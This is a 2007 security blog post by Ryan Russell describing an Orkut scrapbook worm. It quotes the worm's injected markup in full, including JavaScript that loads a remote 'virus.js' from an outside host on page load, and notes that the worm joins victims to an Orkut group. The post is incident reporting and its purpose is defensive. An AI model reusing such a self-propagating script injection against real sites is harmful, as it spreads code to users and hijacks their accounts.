Malware Security Bloggers Network 
SBN

Orkut "virus"

by Ryan Russell on December 19, 2007

More of a worm, actually.

I had an email from Orkut this evening telling me I had a new scrapbook entry. I don’t really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:





2008 vem ai... que ele comece mto bem para vc




I still don’t know exactly what it means, I’m assuming it’s Portuguese. Babelfish wasn’t any help. I won’t mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!













I haven’t done any kind of through analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:


<div id=”flashDiv295378627″><embed type=”application/x-shockwave-flash” src=”Scrapbook_files/LoL.html” style=”” id=”295378627″ name=”295378627″ bgcolor=”#FFFFFF” quality=”autohigh” wmode=”transparent” allownetworking=”internal” allowscriptaccess=”never” height=”1″ width=”1″></embed></div><script type=”text/javascript”> var flashWriter = new _SWFObject(‘http://www.orkut.com/LoL.aspx’, ‘295378627’, ‘1’, ‘1’, ‘9’, ‘#FFFFFF’, ‘autohigh’, ”, ”, ‘295378627’); flashWriter._addParam(‘wmode’, ‘transparent’); script=document.createElement(‘script’);script.src=’http://files.myopera.com/virusdoorkut/files/virus.js’;document.getElementsByTagName(‘head’)[0].appendChild(script);escape(”); flashWriter._addParam(‘allowNetworking’, ‘internal’); flashWriter._addParam(‘allowScriptAccess’, ‘never’); flashWriter._setAttribute(‘style’, ”); flashWriter._write(‘flashDiv295378627’);</script>








Looks like it joins you to an Orkut group, too:


Infectados pelo Vírus do Orkut.


Owner of the group is a new-looking account named “Virus do Orkut”. Also, listed at the end of the virus.js file is this: author=”Rodrigo Lacerda”



*** This is a Security Bloggers Network syndicated blog from ryanlrussell authored by Ryan Russell. Read the original post at: http://ryanlrussell.blogspot.com/2007/12/orkut-virus.html 

		


		
  		

		

		 
		Ryan Russell

		
		,